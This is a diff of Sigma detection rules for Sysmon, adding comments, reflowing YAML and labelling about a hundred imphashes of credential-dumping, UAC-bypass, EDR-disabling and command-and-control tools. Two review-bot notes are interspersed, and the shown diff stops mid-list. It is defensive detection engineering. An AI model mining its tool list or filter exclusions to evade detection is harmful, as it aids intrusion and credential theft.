@@ -58,6 +59,7 @@ detection:
 - \schtasks.exe
 - \smartscreen.exe
 - \spoolsv.exe
+ # - '\taskhost.exe' # disabled due to false positives
 - \tstheme.exe
 - \userinit.exe
 - \vssadmin.exe
@@ -71,10 +73,10 @@ detection:
 filter_main_winlogon_1:
 SourceImage|endswith: :\Windows\System32\winlogon.exe
 TargetImage|endswith:
- - :\Windows\System32\services.exe
- - :\Windows\System32\wininit.exe
- - :\Windows\System32\csrss.exe
- - :\Windows\System32\LogonUI.exe
+ - :\Windows\System32\services.exe # happens on Windows 7
+ - :\Windows\System32\wininit.exe # happens on Windows 7
+ - :\Windows\System32\csrss.exe # multiple OS
+ - :\Windows\System32\LogonUI.exe # multiple OS
 filter_main_winlogon_2:
 SourceImage: C:\Windows\System32\winlogon.exe
 TargetParentProcessId: 4
@@ -93,17 +95,18 @@ detection:
 filter_main_system:
 TargetImage: System
 filter_main_msiexec:
+ # Note: MSI installers will trigger this
 SourceImage|endswith: \msiexec.exe
 TargetImage|contains:
 - \AppData\Local\
 - :\Program Files (x86)\
 - :\Program Files\
 filter_optional_powerpnt:
+ # Raised by the following issue: https://github.com/SigmaHQ/sigma/issues/2479
 SourceImage|contains: \Microsoft Office\
 SourceImage|endswith: \POWERPNT.EXE
 TargetImage|endswith: :\Windows\System32\csrss.exe
- condition: create_remote_thread and (selection and not 1 of filter_main_* and
- not 1 of filter_optional_*)
+ condition: create_remote_thread and (selection and not 1 of filter_main_* and not 1 of filter_optional_*)
 falsepositives:
 - Unknown
 level: high
diff --git a/sigma/sysmon/create_remote_thread/create_remote_thread_win_uncommon_target_image.yml b/sigma/sysmon/create_remote_thread/create_remote_thread_win_uncommon_target_image.yml
index 5a37c6846..bd2b1d4bd 100644
--- a/sigma/sysmon/create_remote_thread/create_remote_thread_win_uncommon_target_image.yml
+++ b/sigma/sysmon/create_remote_thread/create_remote_thread_win_uncommon_target_image.yml
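Review bot: The new `# Note: MSI installers will trigger this` comment on `filter_main_msiexec` in the `@@ -93,17 +95,18 @@` hunk documents why the exclusion exists but not how broad it is: the filter keys on `SourceImage|endswith: \msiexec.exe` with no path anchor and drops every remote thread into targets under `\AppData\Local\`, `:\Program Files (x86)\` and `:\Program Files\`. Whether the `selection` block above already constrains the source path cannot be confirmed from this hunk, as it starts outside it. Suggest expanding the comment to record the scope, e.g. `# Note: MSI installers will trigger this. Matches any image named msiexec.exe regardless of path; anchor to :\Windows\System32\ or \SysWOW64\ if a tighter exclusion is wanted.`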
@@ -1,8 +1,8 @@
 title: Remote Thread Creation In Uncommon Target Image
 id: a1a144b7-5c9b-4853-a559-2172be8d4a03
 related:
- - id: f016c716-754a-467f-a39e-63c06f773987
- type: obsoletes
+ - id: f016c716-754a-467f-a39e-63c06f773987
+ type: obsoletes
 status: experimental
 description: Detects uncommon target processes for remote thread creation
 references:
@@ -56,8 +56,7 @@ detection:
 filter_optional_winzip:
 SourceImage|endswith: :\Program Files\WinZip\FAHWindow64.exe
 TargetImage|endswith: :\Windows\explorer.exe
- condition: create_remote_thread and (selection and not 1 of filter_main_* and
- not 1 of filter_optional_*)
+ condition: create_remote_thread and (selection and not 1 of filter_main_* and not 1 of filter_optional_*)
 falsepositives:
 - Unknown
 level: high
diff --git a/sigma/sysmon/create_stream_hash/create_stream_hash_ads_executable.yml b/sigma/sysmon/create_stream_hash/create_stream_hash_ads_executable.yml
index 0f85ed2bd..06e6a116a 100644
--- a/sigma/sysmon/create_stream_hash/create_stream_hash_ads_executable.yml
+++ b/sigma/sysmon/create_stream_hash/create_stream_hash_ads_executable.yml
@@ -1,8 +1,7 @@
 title: Hidden Executable In NTFS Alternate Data Stream
 id: b69888d4-380c-45ce-9cf9-d9ce46e67821
 status: test
-description: Detects the creation of an ADS (Alternate Data Stream) that contains
- an executable by looking at a non-empty Imphash
+description: Detects the creation of an ADS (Alternate Data Stream) that contains an executable by looking at a non-empty Imphash
 references:
 - https://twitter.com/0xrawsec/status/1002478725605273600?s=21
 author: Florian Roth (Nextron Systems), @0xrawsec
@@ -27,8 +26,6 @@ detection:
 Hash|contains: IMPHASH=00000000000000000000000000000000
 condition: create_stream_hash and (selection and not 1 of filter_main_*)
 falsepositives:
- - This rule isn't looking for any particular binary characteristics. As legitimate
- installers and programs were seen embedding hidden binaries in their ADS.
- Some false positives are expected from browser processes and similar.
+ - This rule isn't looking for any particular binary characteristics. As legitimate installers and programs were seen embedding hidden binaries in their ADS. Some false positives are expected from browser processes and similar.
 level: medium
 ruletype: Sigma
diff --git a/sigma/sysmon/create_stream_hash/create_stream_hash_creation_internet_file.yml b/sigma/sysmon/create_stream_hash/create_stream_hash_creation_internet_file.yml
index e48b6690a..12fb6095d 100644
--- a/sigma/sysmon/create_stream_hash/create_stream_hash_creation_internet_file.yml
+++ b/sigma/sysmon/create_stream_hash/create_stream_hash_creation_internet_file.yml
@@ -1,8 +1,7 @@
 title: Creation Of a Suspicious ADS File Outside a Browser Download
 id: 573df571-a223-43bc-846e-3f98da481eca
 status: experimental
-description: Detects the creation of a suspicious ADS (Alternate Data Stream) file
- by software other than browsers
+description: Detects the creation of a suspicious ADS (Alternate Data Stream) file by software other than browsers
 references:
 - https://www.bleepingcomputer.com/news/security/exploited-windows-zero-day-lets-javascript-files-bypass-security-warnings/
 author: frack113
@@ -55,11 +54,11 @@ detection:
 filter_optional_maxthon:
 Image|endswith: \maxthon.exe
 filter_optional_edge_1:
- - Image|startswith: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\
- - Image|endswith: \WindowsApps\MicrosoftEdge.exe
- - Image:
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
- - C:\Program Files\Microsoft\Edge\Application\msedge.exe
+ - Image|startswith: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\
+ - Image|endswith: \WindowsApps\MicrosoftEdge.exe
+ - Image:
+ - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
+ - C:\Program Files\Microsoft\Edge\Application\msedge.exe
 filter_optional_edge_2:
 Image|startswith:
 - C:\Program Files (x86)\Microsoft\EdgeCore\
@@ -88,7 +87,6 @@ detection:
 condition: create_stream_hash and (selection and not 1 of filter_optional_*)
 falsepositives:
 - Other legitimate browsers not currently included in the filter (please add them)
- - Legitimate downloads via scripting or command-line tools (Investigate to determine
- if it's legitimate)
+ - Legitimate downloads via scripting or command-line tools (Investigate to determine if it's legitimate)
 level: medium
 ruletype: Sigma
diff --git a/sigma/sysmon/create_stream_hash/create_stream_hash_file_sharing_domains_download_susp_extension.yml b/sigma/sysmon/create_stream_hash/create_stream_hash_file_sharing_domains_download_susp_extension.yml
index 9ef9112d7..1921f4268 100644
--- a/sigma/sysmon/create_stream_hash/create_stream_hash_file_sharing_domains_download_susp_extension.yml
+++ b/sigma/sysmon/create_stream_hash/create_stream_hash_file_sharing_domains_download_susp_extension.yml
@@ -1,11 +1,10 @@
 title: Suspicious File Download From File Sharing Websites
 id: 52182dfb-afb7-41db-b4bc-5336cb29b464
 related:
- - id: ae02ed70-11aa-4a22-b397-c0d0e8f6ea99
- type: similar
+ - id: ae02ed70-11aa-4a22-b397-c0d0e8f6ea99
+ type: similar
 status: experimental
-description: Detects the download of suspicious file type from a well-known file and
- paste sharing domain
+description: Detects the download of suspicious file type from a well-known file and paste sharing domain
 references:
 - https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventid=90015
 - https://www.cisa.gov/uscert/ncas/alerts/aa22-321a
@@ -27,7 +26,7 @@ detection:
 Channel: Microsoft-Windows-Sysmon/Operational
 selection_domain:
 Contents|contains:
- - .githubusercontent.com
+ - .githubusercontent.com # Includes both gists and github repositories / Michael Haag (idea)
 - anonfiles.com
 - cdn.discordapp.com
 - cdn.discordapp.com/attachments/
diff --git a/sigma/sysmon/create_stream_hash/create_stream_hash_file_sharing_domains_download_unusual_extension.yml b/sigma/sysmon/create_stream_hash/create_stream_hash_file_sharing_domains_download_unusual_extension.yml
index efa8c55cb..27b90d8ef 100644
--- a/sigma/sysmon/create_stream_hash/create_stream_hash_file_sharing_domains_download_unusual_extension.yml
+++ b/sigma/sysmon/create_stream_hash/create_stream_hash_file_sharing_domains_download_unusual_extension.yml
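Review bot: The comment added to the `.githubusercontent.com` entry in the `@@ -27,7 +26,7 @@` hunk credits the idea but does not say that `Contents|contains` matches every subdomain, raw.githubusercontent.com included, which legitimate installers and update scripts presumably also fetch from, making this likely the noisiest entry in `selection_domain`. Suggest `# Matches all subdomains (gists, raw repository content); expect benign hits from update scripts / Michael Haag (idea)`. The same domain list and the same comment are duplicated in the unusual_extension rule in the next file section, so any tuning should be mirrored there.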
@@ -1,11 +1,10 @@
 title: Unusual File Download From File Sharing Websites
 id: ae02ed70-11aa-4a22-b397-c0d0e8f6ea99
 related:
- - id: 52182dfb-afb7-41db-b4bc-5336cb29b464
- type: similar
+ - id: 52182dfb-afb7-41db-b4bc-5336cb29b464
+ type: similar
 status: experimental
-description: Detects the download of suspicious file type from a well-known file and
- paste sharing domain
+description: Detects the download of suspicious file type from a well-known file and paste sharing domain
 references:
 - https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventid=90015
 - https://www.cisa.gov/uscert/ncas/alerts/aa22-321a
@@ -26,7 +25,7 @@ detection:
 Channel: Microsoft-Windows-Sysmon/Operational
 selection_domain:
 Contents|contains:
- - .githubusercontent.com
+ - .githubusercontent.com # Includes both gists and github repositories / Michael Haag (idea)
 - anonfiles.com
 - cdn.discordapp.com
 - cdn.discordapp.com/attachments/
diff --git a/sigma/sysmon/create_stream_hash/create_stream_hash_hktl_generic_download.yml b/sigma/sysmon/create_stream_hash/create_stream_hash_hktl_generic_download.yml
index 709254600..451b6541e 100644
--- a/sigma/sysmon/create_stream_hash/create_stream_hash_hktl_generic_download.yml
+++ b/sigma/sysmon/create_stream_hash/create_stream_hash_hktl_generic_download.yml
@@ -1,8 +1,7 @@
 title: HackTool Named File Stream Created
 id: 19b041f6-e583-40dc-b842-d6fa8011493f
 status: experimental
-description: Detects the creation of a named file stream with the imphash of a well-known
- hack tool
+description: Detects the creation of a named file stream with the imphash of a well-known hack tool
 references:
 - https://github.com/gentilkiwi/mimikatz
 - https://github.com/topotam/PetitPotam
@@ -32,212 +31,212 @@ detection: EventID: 15 Channel: Microsoft-Windows-Sysmon/Operational selection: - - Imphash: - - bcca3c247b619dcd13c8cdff5f123932 - - 3a19059bd7688cb88e70005f18efc439 - - bf6223a49e45d99094406777eb6004ba - - 0c106686a31bfe2ba931ae1cf6e9dbc6 - - 0d1447d4b3259b3c2a1d4cfb7ece13c3 - - 1b0369a1e06271833f78ffa70ffb4eaf - - 4c1b52a19748428e51b14c278d0f58e3 - - 4d927a711f77d62cebd4f322cb57ec6f - - 66ee036df5fc1004d9ed5e9a94a1086a - - 672b13f4a0b6f27d29065123fe882dfc - - 6bbd59cea665c4afcc2814c1327ec91f - - 725bb81dc24214f6ecacc0cfb36ad30d - - 9528a0e91e28fbb88ad433feabca2456 - - 9da6d5d77be11712527dcab86df449a3 - - a6e01bc1ab89f8d91d9eab72032aae88 - - b24c5eddaea4fe50c6a96a2a133521e4 - - d21bbc50dcc169d7b4d0f01962793154 - - fcc251cceae90d22c392215cc9a2d5d6 - - 23867a89c2b8fc733be6cf5ef902f2d1 - - a37ff327f8d48e8a4d2f757e1b6e70bc - - f9a28c458284584a93b14216308d31bd - - 6118619783fc175bc7ebecff0769b46e - - 959a83047e80ab68b368fdb3f4c6e4ea - - 563233bfa169acc7892451f71ad5850a - - 87575cb7a0e0700eb37f2e3668671a08 - - 13f08707f759af6003837a150a371ba1 - - 1781f06048a7e58b323f0b9259be798b - - 233f85f2d4bc9d6521a6caae11a1e7f5 - - 24af2584cbf4d60bbe5c6d1b31b3be6d - - 632969ddf6dbf4e0f53424b75e4b91f2 - - 713c29b396b907ed71a72482759ed757 - - 749a7bb1f0b4c4455949c0b2bf7f9e9f - - 8628b2608957a6b0c6330ac3de28ce2e - - 8b114550386e31895dfab371e741123d - - 94cb940a1a6b65bed4d5a8f849ce9793 - - 9d68781980370e00e0bd939ee5e6c141 - - b18a1401ff8f444056d29450fbc0a6ce - - cb567f9498452721d77a451374955f5f - - 730073214094cd328547bf1f72289752 - - 17b461a082950fc6332228572138b80c - - dc25ee78e2ef4d36faa0badf1e7461c9 - - 819b19d53ca6736448f9325a85736792 - - 829da329ce140d873b4a8bde2cbfaa7e - - c547f2e66061a8dffb6f5a3ff63c0a74 - - 0588081ab0e63ba785938467e1b10cca - - 0d9ec08bac6c07d9987dfd0f1506587c - - bc129092b71c89b4d4c8cdf8ea590b29 - - 4da924cf622d039d58bce71cdf05d242 - - e7a3a5c377e2d29324093377d7db1c66 - - 9a9dbec5c62f0380b4fa5fd31deffedf - - 
af8a3976ad71e5d5fdfb67ddb8dadfce - - 0c477898bbf137bbd6f2a54e3b805ff4 - - 0ca9f02b537bcea20d4ea5eb1a9fe338 - - 3ab3655e5a14d4eefc547f4781bf7f9e - - e6f9d5152da699934b30daab206471f6 - - 3ad59991ccf1d67339b319b15a41b35d - - ffdd59e0318b85a3e480874d9796d872 - - 0cf479628d7cc1ea25ec7998a92f5051 - - 07a2d4dcbd6cb2c6a45e6b101f0b6d51 - - d6d0f80386e1380d05cb78e871bc72b1 - - 38d9e015591bbfd4929e0d0f47fa0055 - - 0e2216679ca6e1094d63322e3412d650 - - ada161bf41b8e5e9132858cb54cab5fb - - 2a1bc4913cd5ecb0434df07cb675b798 - - 11083e75553baae21dc89ce8f9a195e4 - - a23d29c9e566f2fa8ffbb79267f5df80 - - 4a07f944a83e8a7c2525efa35dd30e2f - - 767637c23bb42cd5d7397cf58b0be688 - - 14c4e4c72ba075e9069ee67f39188ad8 - - 3c782813d4afce07bbfc5a9772acdbdc - - 7d010c6bb6a3726f327f7e239166d127 - - 89159ba4dd04e4ce5559f132a9964eb3 - - 6f33f4a5fc42b8cec7314947bd13f30f - - 5834ed4291bdeb928270428ebbaf7604 - - 5a8a8a43f25485e7ee1b201edcbc7a38 - - dc7d30b90b2d8abf664fbed2b1b59894 - - 41923ea1f824fe63ea5beb84db7a3e74 - - 3de09703c8e79ed2ca3f01074719906b - - a53a02b997935fd8eedcb5f7abab9b9f - - e96a73c7bf33a464c510ede582318bf2 - - 32089b8851bbf8bc2d014e9f37288c83 - - 09D278F9DE118EF09163C6140255C690 - - 03866661686829d806989e2fc5a72606 - - e57401fbdadcd4571ff385ab82bd5d6d - - 84B763C45C0E4A3E7CA5548C710DB4EE - - 19584675d94829987952432e018d5056 - - 330768a4f172e10acb6287b87289d83b - - 885c99ccfbe77d1cbfcb9c4e7c1a3313 - - 22a22bc9e4e0d2f189f1ea01748816ac - - 7fa30e6bb7e8e8a69155636e50bf1b28 - - 96df3a3731912449521f6f8d183279b1 - - 7e6cf3ff4576581271ac8a313b2aab46 - - 51791678f351c03a0eb4e2a7b05c6e17 - - 25ce42b079282632708fc846129e98a5 - - 021bcca20ba3381b11bdde26b4e62f20 - - 59223b5f52d8799d38e0754855cbdf42 - - 81e75d8f1d276c156653d3d8813e4a43 - - 17244e8b6b8227e57fe709ccad421420 - - 5b76da3acdedc8a5cdf23a798b5936b4 - - cb2b65bb77d995cc1c0e5df1c860133c - - 40445337761d80cf465136fafb1f63e6 - - 8a790f401b29fa87bc1e56f7272b3aa6 - - Hash|contains: - - IMPHASH=BCCA3C247B619DCD13C8CDFF5F123932 - - 
IMPHASH=3A19059BD7688CB88E70005F18EFC439 - - IMPHASH=bf6223a49e45d99094406777eb6004ba - - IMPHASH=0C106686A31BFE2BA931AE1CF6E9DBC6 - - IMPHASH=0D1447D4B3259B3C2A1D4CFB7ECE13C3 - - IMPHASH=1B0369A1E06271833F78FFA70FFB4EAF - - IMPHASH=4C1B52A19748428E51B14C278D0F58E3 - - IMPHASH=4D927A711F77D62CEBD4F322CB57EC6F - - IMPHASH=66EE036DF5FC1004D9ED5E9A94A1086A - - IMPHASH=672B13F4A0B6F27D29065123FE882DFC - - IMPHASH=6BBD59CEA665C4AFCC2814C1327EC91F - - IMPHASH=725BB81DC24214F6ECACC0CFB36AD30D - - IMPHASH=9528A0E91E28FBB88AD433FEABCA2456 - - IMPHASH=9DA6D5D77BE11712527DCAB86DF449A3 - - IMPHASH=A6E01BC1AB89F8D91D9EAB72032AAE88 - - IMPHASH=B24C5EDDAEA4FE50C6A96A2A133521E4 - - IMPHASH=D21BBC50DCC169D7B4D0F01962793154 - - IMPHASH=FCC251CCEAE90D22C392215CC9A2D5D6 - - IMPHASH=23867A89C2B8FC733BE6CF5EF902F2D1 - - IMPHASH=A37FF327F8D48E8A4D2F757E1B6E70BC - - IMPHASH=F9A28C458284584A93B14216308D31BD - - IMPHASH=6118619783FC175BC7EBECFF0769B46E - - IMPHASH=959A83047E80AB68B368FDB3F4C6E4EA - - IMPHASH=563233BFA169ACC7892451F71AD5850A - - IMPHASH=87575CB7A0E0700EB37F2E3668671A08 - - IMPHASH=13F08707F759AF6003837A150A371BA1 - - IMPHASH=1781F06048A7E58B323F0B9259BE798B - - IMPHASH=233F85F2D4BC9D6521A6CAAE11A1E7F5 - - IMPHASH=24AF2584CBF4D60BBE5C6D1B31B3BE6D - - IMPHASH=632969DDF6DBF4E0F53424B75E4B91F2 - - IMPHASH=713C29B396B907ED71A72482759ED757 - - IMPHASH=749A7BB1F0B4C4455949C0B2BF7F9E9F - - IMPHASH=8628B2608957A6B0C6330AC3DE28CE2E - - IMPHASH=8B114550386E31895DFAB371E741123D - - IMPHASH=94CB940A1A6B65BED4D5A8F849CE9793 - - IMPHASH=9D68781980370E00E0BD939EE5E6C141 - - IMPHASH=B18A1401FF8F444056D29450FBC0A6CE - - IMPHASH=CB567F9498452721D77A451374955F5F - - IMPHASH=730073214094CD328547BF1F72289752 - - IMPHASH=17B461A082950FC6332228572138B80C - - IMPHASH=DC25EE78E2EF4D36FAA0BADF1E7461C9 - - IMPHASH=819B19D53CA6736448F9325A85736792 - - IMPHASH=829DA329CE140D873B4A8BDE2CBFAA7E - - IMPHASH=C547F2E66061A8DFFB6F5A3FF63C0A74 - - IMPHASH=0588081AB0E63BA785938467E1B10CCA - - 
IMPHASH=0D9EC08BAC6C07D9987DFD0F1506587C - - IMPHASH=BC129092B71C89B4D4C8CDF8EA590B29 - - IMPHASH=4DA924CF622D039D58BCE71CDF05D242 - - IMPHASH=E7A3A5C377E2D29324093377D7DB1C66 - - IMPHASH=9A9DBEC5C62F0380B4FA5FD31DEFFEDF - - IMPHASH=AF8A3976AD71E5D5FDFB67DDB8DADFCE - - IMPHASH=0C477898BBF137BBD6F2A54E3B805FF4 - - IMPHASH=0CA9F02B537BCEA20D4EA5EB1A9FE338 - - IMPHASH=3AB3655E5A14D4EEFC547F4781BF7F9E - - IMPHASH=E6F9D5152DA699934B30DAAB206471F6 - - IMPHASH=3AD59991CCF1D67339B319B15A41B35D - - IMPHASH=FFDD59E0318B85A3E480874D9796D872 - - IMPHASH=0CF479628D7CC1EA25EC7998A92F5051 - - IMPHASH=07A2D4DCBD6CB2C6A45E6B101F0B6D51 - - IMPHASH=D6D0F80386E1380D05CB78E871BC72B1 - - IMPHASH=38D9E015591BBFD4929E0D0F47FA0055 - - IMPHASH=0E2216679CA6E1094D63322E3412D650 - - IMPHASH=ADA161BF41B8E5E9132858CB54CAB5FB - - IMPHASH=2A1BC4913CD5ECB0434DF07CB675B798 - - IMPHASH=11083E75553BAAE21DC89CE8F9A195E4 - - IMPHASH=A23D29C9E566F2FA8FFBB79267F5DF80 - - IMPHASH=4A07F944A83E8A7C2525EFA35DD30E2F - - IMPHASH=767637C23BB42CD5D7397CF58B0BE688 - - IMPHASH=14C4E4C72BA075E9069EE67F39188AD8 - - IMPHASH=3C782813D4AFCE07BBFC5A9772ACDBDC - - IMPHASH=7D010C6BB6A3726F327F7E239166D127 - - IMPHASH=89159BA4DD04E4CE5559F132A9964EB3 - - IMPHASH=6F33F4A5FC42B8CEC7314947BD13F30F - - IMPHASH=5834ED4291BDEB928270428EBBAF7604 - - IMPHASH=5A8A8A43F25485E7EE1B201EDCBC7A38 - - IMPHASH=DC7D30B90B2D8ABF664FBED2B1B59894 - - IMPHASH=41923EA1F824FE63EA5BEB84DB7A3E74 - - IMPHASH=3DE09703C8E79ED2CA3F01074719906B - - IMPHASH=A53A02B997935FD8EEDCB5F7ABAB9B9F - - IMPHASH=E96A73C7BF33A464C510EDE582318BF2 - - IMPHASH=32089B8851BBF8BC2D014E9F37288C83 - - IMPHASH=09D278F9DE118EF09163C6140255C690 - - IMPHASH=03866661686829d806989e2fc5a72606 - - IMPHASH=e57401fbdadcd4571ff385ab82bd5d6d - - IMPHASH=84B763C45C0E4A3E7CA5548C710DB4EE - - IMPHASH=19584675D94829987952432E018D5056 - - IMPHASH=330768A4F172E10ACB6287B87289D83B - - IMPHASH=885C99CCFBE77D1CBFCB9C4E7C1A3313 - - IMPHASH=22A22BC9E4E0D2F189F1EA01748816AC - - 
IMPHASH=7FA30E6BB7E8E8A69155636E50BF1B28 - - IMPHASH=96DF3A3731912449521F6F8D183279B1 - - IMPHASH=7E6CF3FF4576581271AC8A313B2AAB46 - - IMPHASH=51791678F351C03A0EB4E2A7B05C6E17 - - IMPHASH=25CE42B079282632708FC846129E98A5 - - IMPHASH=021BCCA20BA3381B11BDDE26B4E62F20 - - IMPHASH=59223B5F52D8799D38E0754855CBDF42 - - IMPHASH=81E75D8F1D276C156653D3D8813E4A43 - - IMPHASH=17244E8B6B8227E57FE709CCAD421420 - - IMPHASH=5B76DA3ACDEDC8A5CDF23A798B5936B4 - - IMPHASH=CB2B65BB77D995CC1C0E5DF1C860133C - - IMPHASH=40445337761D80CF465136FAFB1F63E6 - - IMPHASH=8A790F401B29FA87BC1E56F7272B3AA6 + - Imphash: + - bcca3c247b619dcd13c8cdff5f123932 # PetitPotam + - 3a19059bd7688cb88e70005f18efc439 # PetitPotam + - bf6223a49e45d99094406777eb6004ba # PetitPotam + - 0c106686a31bfe2ba931ae1cf6e9dbc6 # Mimikatz + - 0d1447d4b3259b3c2a1d4cfb7ece13c3 # Mimikatz + - 1b0369a1e06271833f78ffa70ffb4eaf # Mimikatz + - 4c1b52a19748428e51b14c278d0f58e3 # Mimikatz + - 4d927a711f77d62cebd4f322cb57ec6f # Mimikatz + - 66ee036df5fc1004d9ed5e9a94a1086a # Mimikatz + - 672b13f4a0b6f27d29065123fe882dfc # Mimikatz + - 6bbd59cea665c4afcc2814c1327ec91f # Mimikatz + - 725bb81dc24214f6ecacc0cfb36ad30d # Mimikatz + - 9528a0e91e28fbb88ad433feabca2456 # Mimikatz + - 9da6d5d77be11712527dcab86df449a3 # Mimikatz + - a6e01bc1ab89f8d91d9eab72032aae88 # Mimikatz + - b24c5eddaea4fe50c6a96a2a133521e4 # Mimikatz + - d21bbc50dcc169d7b4d0f01962793154 # Mimikatz + - fcc251cceae90d22c392215cc9a2d5d6 # Mimikatz + - 23867a89c2b8fc733be6cf5ef902f2d1 # JuicyPotato + - a37ff327f8d48e8a4d2f757e1b6e70bc # JuicyPotato + - f9a28c458284584a93b14216308d31bd # JuicyPotatoNG + - 6118619783fc175bc7ebecff0769b46e # RoguePotato + - 959a83047e80ab68b368fdb3f4c6e4ea # RoguePotato + - 563233bfa169acc7892451f71ad5850a # RoguePotato + - 87575cb7a0e0700eb37f2e3668671a08 # RoguePotato + - 13f08707f759af6003837a150a371ba1 # Pwdump + - 1781f06048a7e58b323f0b9259be798b # Pwdump + - 233f85f2d4bc9d6521a6caae11a1e7f5 # Pwdump + - 24af2584cbf4d60bbe5c6d1b31b3be6d # 
Pwdump + - 632969ddf6dbf4e0f53424b75e4b91f2 # Pwdump + - 713c29b396b907ed71a72482759ed757 # Pwdump + - 749a7bb1f0b4c4455949c0b2bf7f9e9f # Pwdump + - 8628b2608957a6b0c6330ac3de28ce2e # Pwdump + - 8b114550386e31895dfab371e741123d # Pwdump + - 94cb940a1a6b65bed4d5a8f849ce9793 # PwDumpX + - 9d68781980370e00e0bd939ee5e6c141 # Pwdump + - b18a1401ff8f444056d29450fbc0a6ce # Pwdump + - cb567f9498452721d77a451374955f5f # Pwdump + - 730073214094cd328547bf1f72289752 # Htran + - 17b461a082950fc6332228572138b80c # Cobalt Strike beacons + - dc25ee78e2ef4d36faa0badf1e7461c9 # Cobalt Strike beacons + - 819b19d53ca6736448f9325a85736792 # Cobalt Strike beacons + - 829da329ce140d873b4a8bde2cbfaa7e # Cobalt Strike beacons + - c547f2e66061a8dffb6f5a3ff63c0a74 # PPLDump + - 0588081ab0e63ba785938467e1b10cca # PPLDump + - 0d9ec08bac6c07d9987dfd0f1506587c # NanoDump + - bc129092b71c89b4d4c8cdf8ea590b29 # NanoDump + - 4da924cf622d039d58bce71cdf05d242 # NanoDump + - e7a3a5c377e2d29324093377d7db1c66 # NanoDump + - 9a9dbec5c62f0380b4fa5fd31deffedf # NanoDump + - af8a3976ad71e5d5fdfb67ddb8dadfce # NanoDump + - 0c477898bbf137bbd6f2a54e3b805ff4 # NanoDump + - 0ca9f02b537bcea20d4ea5eb1a9fe338 # NanoDump + - 3ab3655e5a14d4eefc547f4781bf7f9e # NanoDump + - e6f9d5152da699934b30daab206471f6 # NanoDump + - 3ad59991ccf1d67339b319b15a41b35d # NanoDump + - ffdd59e0318b85a3e480874d9796d872 # NanoDump + - 0cf479628d7cc1ea25ec7998a92f5051 # NanoDump + - 07a2d4dcbd6cb2c6a45e6b101f0b6d51 # NanoDump + - d6d0f80386e1380d05cb78e871bc72b1 # NanoDump + - 38d9e015591bbfd4929e0d0f47fa0055 # HandleKatz + - 0e2216679ca6e1094d63322e3412d650 # HandleKatz + - ada161bf41b8e5e9132858cb54cab5fb # DripLoader + - 2a1bc4913cd5ecb0434df07cb675b798 # DripLoader + - 11083e75553baae21dc89ce8f9a195e4 # DripLoader + - a23d29c9e566f2fa8ffbb79267f5df80 # DripLoader + - 4a07f944a83e8a7c2525efa35dd30e2f # CreateMiniDump + - 767637c23bb42cd5d7397cf58b0be688 # UACMe Akagi + - 14c4e4c72ba075e9069ee67f39188ad8 # UACMe Akagi + - 
3c782813d4afce07bbfc5a9772acdbdc # UACMe Akagi + - 7d010c6bb6a3726f327f7e239166d127 # UACMe Akagi + - 89159ba4dd04e4ce5559f132a9964eb3 # UACMe Akagi + - 6f33f4a5fc42b8cec7314947bd13f30f # UACMe Akagi + - 5834ed4291bdeb928270428ebbaf7604 # UACMe Akagi + - 5a8a8a43f25485e7ee1b201edcbc7a38 # UACMe Akagi + - dc7d30b90b2d8abf664fbed2b1b59894 # UACMe Akagi + - 41923ea1f824fe63ea5beb84db7a3e74 # UACMe Akagi + - 3de09703c8e79ed2ca3f01074719906b # UACMe Akagi + - a53a02b997935fd8eedcb5f7abab9b9f # WCE + - e96a73c7bf33a464c510ede582318bf2 # WCE + - 32089b8851bbf8bc2d014e9f37288c83 # Sliver Stagers + - 09D278F9DE118EF09163C6140255C690 # Dumpert + - 03866661686829d806989e2fc5a72606 # Dumpert + - e57401fbdadcd4571ff385ab82bd5d6d # Dumpert + - 84B763C45C0E4A3E7CA5548C710DB4EE # SysmonEnte + - 19584675d94829987952432e018d5056 # SysmonQuiet + - 330768a4f172e10acb6287b87289d83b # ShaprEvtMute Hook + - 885c99ccfbe77d1cbfcb9c4e7c1a3313 # Forkatz + - 22a22bc9e4e0d2f189f1ea01748816ac # PPLKiller + - 7fa30e6bb7e8e8a69155636e50bf1b28 # PPLKiller + - 96df3a3731912449521f6f8d183279b1 # Backstab + - 7e6cf3ff4576581271ac8a313b2aab46 # Backstab + - 51791678f351c03a0eb4e2a7b05c6e17 # Backstab + - 25ce42b079282632708fc846129e98a5 # Forensia + - 021bcca20ba3381b11bdde26b4e62f20 # EDRSandBlast + - 59223b5f52d8799d38e0754855cbdf42 # EDRSandBlast + - 81e75d8f1d276c156653d3d8813e4a43 # EDRSandBlast + - 17244e8b6b8227e57fe709ccad421420 # EDRSandBlast + - 5b76da3acdedc8a5cdf23a798b5936b4 # EDRSandBlast + - cb2b65bb77d995cc1c0e5df1c860133c # EDRSandBlast + - 40445337761d80cf465136fafb1f63e6 # EDRSandBlast + - 8a790f401b29fa87bc1e56f7272b3aa6 # EDRSilencer + - Hash|contains: # Sysmon field hashes contains all types + - IMPHASH=BCCA3C247B619DCD13C8CDFF5F123932 # PetitPotam + - IMPHASH=3A19059BD7688CB88E70005F18EFC439 # PetitPotam + - IMPHASH=bf6223a49e45d99094406777eb6004ba # PetitPotam + - IMPHASH=0C106686A31BFE2BA931AE1CF6E9DBC6 # Mimikatz + - IMPHASH=0D1447D4B3259B3C2A1D4CFB7ECE13C3 # Mimikatz + - 
